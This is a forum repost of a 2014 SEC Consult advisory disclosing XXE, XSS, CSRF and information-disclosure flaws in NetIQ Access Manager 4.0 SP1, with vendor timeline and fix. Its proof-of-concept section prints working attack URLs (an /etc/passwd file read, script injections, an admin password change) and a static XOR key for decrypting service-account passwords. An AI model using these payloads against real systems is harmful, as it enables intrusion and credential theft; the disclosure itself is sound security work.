Aerosol Posted December 19, 2014 Report Posted December 19, 2014 SEC Consult Vulnerability Lab Security Advisory < 20141218-2 >======================================================================= title: Multiple high risk vulnerabilities product: NetIQ Access Manager vulnerable version: 4.0 SP1 fixed version: 4.0 SP1 Hot Fix 3 CVE number: CVE-2014-5214, CVE-2014-5215, CVE-2014-5216, CVE-2014-5217 impact: High homepage: https://www.netiq.com/ found: 2014-10-29 by: W. Ettlinger SEC Consult Vulnerability Lab https://www.sec-consult.com=======================================================================Vendor/product description:---------------------------"As demands for secure web access expand and delivery becomes increasinglycomplex, organizations face some formidable challenges. Access Managerprovides a simple yet secure and scalable solution that can handle all yourweb access needs—both internal as well as in the cloud."URL: https://www.netiq.com/products/access-manager/Business recommendation:------------------------An attacker without an account on the NetIQ Access Manager is be able to gainadministrative access by combining different attack vectors. Though this hostmay not always be accessible from a public network, an attacker is still ableto compromise the system when directly targeting administrative users.Because the NetIQ Access Manager is used for authentication, an attackercompromising the system can use it to gain access to other systems.SEC Consult highly recommends that this software is not used until a fullsecurity review has been performed and all issues have been resolved.Vulnerability overview/description:-----------------------------------1) XML eXternal Entity Injection (XXE, CVE-2014-5214)Authenticated administrative users can download arbitrary files from the AccessManager administration interface as the user "novlwww".The vendor provided the following KB link:https://www.novell.com/support/kb/doc.php?id=70159932) Reflected Cross Site Scripting (XSS, CVE-2014-5216)Multiple reflected cross site scripting vulnerabilities were found. Theseallow effective attacks of administrative and SSLVPN sessions.The vendor provided the following KB link:https://www.novell.com/support/kb/doc.php?id=70159943) Persistent Site Scripting (XSS, CVE-2014-5216)A persistent cross site scripting vulnerability was found. This allowseffective attacks of administrative and SSLVPN sessions.The vendor provided the following KB link:https://www.novell.com/support/kb/doc.php?id=70159964) Cross Site Request Forgery (CVE-2014-5217)The Access Manager administration interface does not have CSRF protection.The vendor provided the following KB link:https://www.novell.com/support/kb/doc.php?id=70159975) Information Disclosure (CVE-2014-5215)Authenticated users of the administration interface can gain authenticationinformation of internal administrative users.The vendor provided the following KB link:https://www.novell.com/support/kb/doc.php?id=7015995By combining all of the above vulnerabilities (CSRF, XSS, XXE) anunauthenticated, non-admin user may gain full access to the system!Proof of concept:-----------------1) XML eXternal Entity Injection (XXE)As an example, the following URL demonstrates the retrieval of the /etc/passwdfile as an authenticated administrative user:https://<host>:8443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter&nextState=initialState&merge=fw.TCPreviewFilter&query=<!DOCTYPE+request+[%0a<!ENTITY+include+SYSTEM+"/etc/passwd">%0a]><query><container>%26include%3b</container><subclasses>false</subclasses></query>2) Reflected Cross Site Scripting (XSS)The following URLs demonstrate different reflected XSS flaws in theadministration interface and the user interface.https://<host>:8443/nps/servlet/webacc?taskId=dev.Empty&merge=dm.GenericTask&location=/roma/jsp/admin/view/main.jss'%2balert+('xss')%2b'https://<host>:8443/roma/jsp/debug/debug.jsp?xss=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3Ehttps://<host>:8443//nps/servlet/webacc?taskId=debug.DumpAll&xss=%3Cimg%20src=%22/404%22%20onerror=%22alert+%28%27xss%27%29%22%3Ehttps://<host>/nidp/jsp/x509err.jsp?error=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3Ehttps://<host>/sslvpn/applet_agent.jsp?lang=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E3) Persistent Site Scripting (XSS)The following URL injects a stored script on the auditing page:https://<host>:8443/roma/system/cntl?handler=dispatcher&command=auditsave&&secureLoggingServersA='){}};alert('xss');function+){if('&port=12894) Cross Site Request ForgeryAs an example, an attacker is able to change the administration password to'12345' by issuing a GET request in the context of an authenticatedadministrator. The old password is not necessary for this attack!https://<host>:8443/nps/servlet/webacc?taskId=fw.SetPassword&nextState=doSetPassword&merge=dev.GenConf&selectedObject=P%3Aadmin.novellP&single=admin.novell&SetPswdNewPassword=12345&SetPswdVerifyPassword=123455) Information DisclosureThe following URLs disclose several useful information to an authenticatedaccount:https://<host>:8443/roma/jsp/volsc/monitoring/dev_services.jsphttps://<host>:8443/roma/jsp/debug/debug.jspThe disclosed system properties: com.volera.vcdn.monitor.password com.volera.vcdn.alert.password com.volera.vcdn.sync.password com.volera.vcdn.scheduler.password com.volera.vcdn.publisher.password com.volera.vcdn.application.sc.scheduler.password com.volera.vcdn.health.passwordThe static string "k~jd)*L2;93=Gjs" is XORed with these values in orderto decrypt passwords of internally used service accounts.By combining all of the above vulnerabilities (CSRF, XSS, XXE) anunauthenticated, non-admin user may gain full access to the system!Vulnerable / tested versions:-----------------------------The vulnerabilities have been verified to exist in the NetIQ Access Managerversion 4.0 SP1, which was the most recent version at the time of discovery.Vendor contact timeline:------------------------2014-10-29: Contacting security@netiq.com, sending responsible disclosure policy and PGP keys2014-10-29: Vendor redirects to security@novell.com, providing PGP keys through Novell support page2014-10-30: Sending encrypted security advisory to Novell2014-10-30: Novell acknowledges the receipt of the advisory2014-12-16: Novell: the vulnerability fixes will be released tomorrow; The CSRF vulnerability will not be fixed immediately ("Since this can be done only after an authorized login"); two XSS vulnerabilities can not be exploited ("We could not take advantage or retrieve any cookie info on the server side - it looks like it's a client side cross scripting attack.")2014-12-16: Explaining why those vulnerabilities can be exploited2014-12-17: Novell: Fix will be released tomorrow2014-12-17: Verifying release of advisory tomorrow2014-12-18: Novell: Advisory can be released2014-12-18: Coordinated release of security advisorySolution:---------Update to the latest available of Access Manager and implement workaroundsmentioned in the KB articles by Novell linked above.Workaround:-----------For some vulnerabilities, Novell provides best practice recommendations in theURLs linked above.Advisory URL:-------------https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabSEC ConsultVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - ZurichHeadquarter:Mooslackengasse 17, 1190 Vienna, AustriaPhone: +43 1 8903043 0Fax: +43 1 8903043 15Mail: research at sec-consult dot comWeb: https://www.sec-consult.comBlog: http://blog.sec-consult.comTwitter: https://twitter.com/sec_consultInterested to work with the experts of SEC Consult?Write to career@sec-consult.comEOF W. Ettlinger / @2014Source Quote
